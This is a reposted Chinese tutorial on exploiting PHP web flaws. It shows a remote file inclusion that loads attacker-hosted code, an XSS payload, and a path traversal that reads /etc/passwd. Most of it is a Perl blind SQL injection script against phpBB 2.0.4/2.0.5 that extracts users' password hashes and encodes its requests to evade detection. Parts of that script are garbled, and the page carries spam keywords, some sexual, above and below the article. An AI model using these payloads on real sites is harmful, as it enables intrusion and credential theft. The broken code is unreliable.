国产探花免费观看_亚洲丰满少妇自慰呻吟_97日韩有码在线_资源在线日韩欧美_一区二区精品毛片,辰东完美世界有声小说,欢乐颂第一季,yy玄幻小说排行榜完本

首頁 > 編程 > PHP > 正文

PHP網(wǎng)站漏洞的相關(guān)總結(jié)(1)

2020-03-22 18:00:43
字體:
供稿:網(wǎng)友

PHP網(wǎng)站漏洞的相關(guān)總結(jié)

從現(xiàn)在的html' target='_blank'>網(wǎng)絡(luò)安全來看,大家最關(guān)注和接觸最多的WEB頁面漏洞應(yīng)該是ASP了,在這方面,小竹是專家,我沒發(fā)言權(quán)。然而在PHP方面來看,也同樣存在很嚴重的安全問題,但是這方面的文章卻不多。在這里,就跟大家來稍微的討論一下PHP頁面的相關(guān)漏洞吧。

我對目前常見的PHP漏洞做了一下總結(jié),大致分為以下幾種:包含文件漏洞,腳本命令執(zhí)行漏洞,文件泄露漏洞,SQL注入漏洞等幾種。當然,至于COOKIE欺騙等一部分通用的技術(shù)就不在這里討論了,這些資料網(wǎng)上也很多。那么,我們就一個一個來分析一下怎樣利用這些漏洞吧!

首先,我們來討論包含文件漏洞。這個漏洞應(yīng)該說是PHP獨有的吧。這是由于不充分處理外部提供的惡意數(shù)據(jù),從而導(dǎo)致遠程攻擊者可以利用這些漏洞以WEB進程權(quán)限在系統(tǒng)上執(zhí)行任意命令。我們來看一個例子:假設(shè)在a.php中有這樣一句代碼:

<?php

include($include."/xxx.php");

?>

在這段代碼中,$include一般是一個已經(jīng)設(shè)置好的路徑,但是我們可以通過自己構(gòu)造一個路徑來達到攻擊的目的。比方說我們提交:a.php?include=http://web/b.php,這個web是我們用做攻擊的空間,當然,b.php也就是我們用來攻擊的代碼了。我們可以在b.php中寫入類似于:passthru("/bin/ls /etc");的代碼。這樣,就可以執(zhí)行一些有目的的攻擊了。(注:web服務(wù)器應(yīng)該不能執(zhí)行php代碼,不然就出問題了。相關(guān)詳情可以去看《如何對PHP程序中的常見漏洞進行攻擊》)。在這個漏洞方面,出狀況的很多,比方說:PayPal Store Front,

HotNews,Mambo Open Source,PhpDig,YABB SE,phpBB,InvisionBoard,SOLMETRA SPAW Editor,Les Visiteurs,PhpGedView,X-Cart等等一些。

接著,我們再來看一下腳本命令執(zhí)行漏洞。這是由于對用戶提交的URI參數(shù)缺少充分過濾,提交包含惡意HTML代碼的數(shù)據(jù),可導(dǎo)致觸發(fā)跨站腳本攻擊,可能獲得目標用戶的敏感信息。我們也舉個例子:在PHP Transparent的PHP PHP 4.3.1以下版本中的index.php頁面對PHPSESSID缺少充分的過濾,我們可以通過這樣的代碼來達到攻擊的目的:

http://web/index.php?PHPSESSID="><script>…</script>在script里面我們可以構(gòu)造函數(shù)來獲得用戶的一些敏感信息。在這個漏洞方面相對要少一點,除了PHP Transparent之外還有:PHP-Nuke,phpBB,PHP Classifieds,PHPix,Ultimate PHP Board等等。

再然后,我們就來看看文件泄露漏洞了。這種漏洞是由于對用戶提交參數(shù)缺少充分過濾,遠程攻擊者可以利用它進行目錄遍歷攻擊以及獲取一些敏感信息。我們拿最近發(fā)現(xiàn)的phpMyAdmin來做例子。在phpMyAdmin中,export.php頁面沒有對用戶提交的'what'參數(shù)進行充分過濾,遠程攻擊者提交包含多個'/'字符的數(shù)據(jù),便可繞過WEB ROOT限制,以WEB權(quán)限查看系統(tǒng)上的任意文件信息。比方說打入這樣一個地址:export.php?what=//////etc/passwd%00 就可以達到文件泄露的目的了。在這方面相對多一點,有:myPHPNuke,McNews等等。

最后,我們又要回到最興奮的地方了。想想我們平時在asp頁面中用SQL注入有多么爽,以前還要手動注入,一直到小竹悟出"SQL注入密笈"(嘿嘿),然后再開做出NBSI以后,我們NB聯(lián)盟真是拉出一片天空。曾先后幫CSDN,大富翁論壇,中國頻道等大型網(wǎng)站找出漏洞。(這些廢話不多說了,有點跑題了…)。還是言規(guī)正傳,其實在asp中SQL的注入和php中的SQL注入大致相同,只不過稍微注意一下用的幾個函數(shù)就好了。將asc改成ASCII,len改成LENGTH,其他函數(shù)基本不變了。其實大家看到PHP的SQL注入,是不是都會想到PHP-NUKE和PHPBB呢?不錯,俗話說樹大招分,像動網(wǎng)這樣的論壇在asp界就該是漏洞這王了,這并不是說它的論壇安全太差,而是名氣太響,別人用的多了,研究的人也就多了,發(fā)現(xiàn)的安全漏洞也就越多了。PHPBB也是一樣的,現(xiàn)在很大一部分人用PHP做論壇的話,一般都是選擇了PHPBB.它的漏洞也是一直在出,從最早phpBB.com phpBB 1.4.0版本被人發(fā)現(xiàn)漏洞,到現(xiàn)在最近的phpBB 2.0.6版本的groupcp.php,以及之前發(fā)現(xiàn)的search.php,profile.php,viewtopic.php等等加起來,大概也有十來個樣子吧。這也一直導(dǎo)致,一部分人在研究php漏洞的時候都會拿它做實驗品,所謂百練成精嘛,相信以后的PHPBB會越來越好。

好了,我們還是來分析一下漏洞產(chǎn)生的原因吧。拿viewtopic.php頁面來說,由于在調(diào)用viewtopic.php時,直接從GET請求中獲得"topic_id"并傳遞給SQL查詢命令,而并沒有進行一些過濾的處理,攻擊者可以提交特殊的SQL字符串用于獲得MD5密碼,獲得此密碼信息可以用于自動登錄或者進行暴力破解。(我想應(yīng)該不會有人想去暴力破解吧,除非有特別重要的原因)。先看一下相關(guān)源代碼:

# if ( isset($HTTP_GET_VARS[POST_TOPIC_URL]) )

# {

# $topic_id = intval($HTTP_GET_VARS[POST_TOPIC_URL]);

# }

# else if ( isset($HTTP_GET_VARS['topic']) )

# {

# $topic_id = intval($HTTP_GET_VARS['topic']);

# }

從上面我們可以看出,如果提交的view=newest并且sid設(shè)置了值的話,執(zhí)行的查詢代碼像下面的這個樣子(如果你還沒看過PHPBB源代碼的話,建議你看了再對著這里來看,受影響系統(tǒng)為:phpBB 2.0.5和phpBB 2.0.4)。

# $sql = "SELECT p.post_id

# FROM " . POSTS_TABLE . " p, " . SESSIONS_TABLE . " s, " . USERS_TABLE . " u

# WHERE s.session_id = '$session_id'

# AND u.user_id = s.session_user_id

# AND p.topic_id = $topic_id

# AND p.post_time >= u.user_lastvisit

# ORDER BY p.post_time ASC

# LIMIT 1";

Rick提供了下面的這斷測試代碼:

use IO::Socket;

$remote = shift || 'localhost';

$view_topic = shift || '/phpBB2/viewtopic.php';

$uid = shift || 2;

$port = 80;

$dbtype = 'mysql4'; # mysql4 or pgsql

print "Trying to get password hash for uid $uid server $remote dbtype: $dbtype ";

$p = "";

for($index=1; $index<=32; $index++)

{

$socket = IO::Socket::INET->new(PeerAddr => $remote,

PeerPort => $port,

Proto => "tcp",

Type => SOCK_STREAM)

or die "Couldnt connect to $remote:$port : $@ ";

$str = "GET $view_topic" . "?sid=1&topic_id=-1" . random_encode(make_dbsql()) . "&view=newest" . " HTTP/1.0 ";

print $socket $str;

print $socket "Cookie: phpBB2mysql_sid=1 "; # replace this for pgsql or remove it

print $socket "Host: $remote ";

while ($answer = <$socket>)

{

if ($answer =—— /location:.*#(d+)/) # Matches the location: viewtopic.php?p=<num>#<num>

{

$p .= chr ();

}

}

close($socket);

}

print " MD5 Hash for uid $uid is $p ";

# random encode str. helps avoid detection

sub random_encode

{

$str = shift;

$ret = "";

for($i=0; $i<length($str); $i++)

{

$c = substr($str,$i,1);

$j = rand length($str) * 1000;

if (int($j) % 2 || $c eq ' ')

{

$ret .= "%" . sprintf("%x",ord($c));

}

else

{

$ret .= $c;

}

}

return $ret;

}

sub make_dbsql

{

if ($dbtype eq 'mysql4')

{

return " union select ord(substring(user_password," . $index . ",1)) from phpbb_users where user_id=$uid/*" ;

} elsif ($dbtype eq 'pgsql')

{

return "; select ascii(substring(user_password from $index for 1)) as post_id from phpbb_posts p, phpbb_users u where u.user_id=$uid or false";

}

else

{

return "";

}

}

這斷代碼,我就不多做解釋了。作用是獲得HASH值。

鄭重聲明:本文版權(quán)歸原作者所有,轉(zhuǎn)載文章僅為傳播更多信息之目的,如作者信息標記有誤,請第一時間聯(lián)系我們修改或刪除,多謝。

發(fā)表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發(fā)表
主站蜘蛛池模板: 富川| 彝良县| 会理县| 鲁山县| 凤山县| 武冈市| 亳州市| 包头市| 宣汉县| 应用必备| 湖州市| 筠连县| 广安市| 漳浦县| 平阳县| 万安县| 友谊县| 红桥区| 调兵山市| 宣化县| 淮滨县| 香河县| 德化县| 中西区| 新竹市| 河北区| 达拉特旗| 凤山市| 且末县| 杭锦后旗| 永安市| 安阳市| 安达市| 黔西| 东莞市| 罗定市| 三穗县| 博客| 诸城市| 贵阳市| 从江县|